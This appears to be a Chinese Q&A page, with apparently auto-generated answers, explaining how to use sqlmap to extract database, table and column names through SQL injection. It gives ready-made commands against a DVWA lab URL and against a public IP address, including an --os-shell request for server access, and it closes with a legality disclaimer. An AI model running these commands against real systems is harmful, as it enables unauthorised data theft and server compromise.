sqlmap命令爆库
时间: 2023-11-22 14:43:03 浏览: 85
SQLmap是一款用于检测和利用SQL注入漏洞的免费开源工具。它具有自动化处理的特性,可以进行数据库指纹识别、访问底层文件系统和执行命令等操作。要使用sqlmap命令来爆库,您可以使用以下命令:
sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#' --cookie='security=low;PHPSESSID=9sl0enh9nkoto78fro3r8df4l7' --dbs -v 0
这个命令将在指定的URL上进行SQL注入检测,并尝试爆破数据库。通过指定--dbs选项,您可以获取目标网站上所有的数据库名称。
相关问题
sqlmap爆库命令
使用sqlmap进行数据库爆破的命令有多种。以下是一些常用的sqlmap命令示例:
- 要获取当前数据库名称的命令是: sqlmap -u "http://43.138.211.45/news.php?cid=1" --current-db。
- 要获取操作系统级别的shell访问的命令是: sqlmap -u "http://43.138.211.45/news.php?cid=1" --os-shell。
- 要获取指定表的列信息的命令是: sqlmap -u "http://43.138.211.45/news.php?cid=1" -T 510_admin --columns。
- 要获取指定数据库中的表信息的命令是: sqlmap -u "http://43.138.211.45/news.php?cid=1" -D 510cms --tables。
请注意,这些命令仅供参考,并且在实际使用时可能需要根据目标数据库的不同进行调整。在使用sqlmap进行数据库爆破时,请确保遵守法律法规,并获得合法授权。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>
sqlmap爆库爆表名post
使用sqlmap工具可以进行数据库的爆库和爆表操作。首先,通过运行以下命令可以爆出当前数据库的名称和用户名:
```
sqlmap -r "post1.txt" --current-db --current-user
```
然后,可以使用以下命令来爆出当前数据库中的表名:
```
sqlmap -r "post1.txt" --tables -D <数据库名称>
```
其中,`<数据库名称>`是前一步中爆出的数据库名称。
请注意,这是一个示例命令,具体使用时需要根据实际情况进行修改。
阅读全文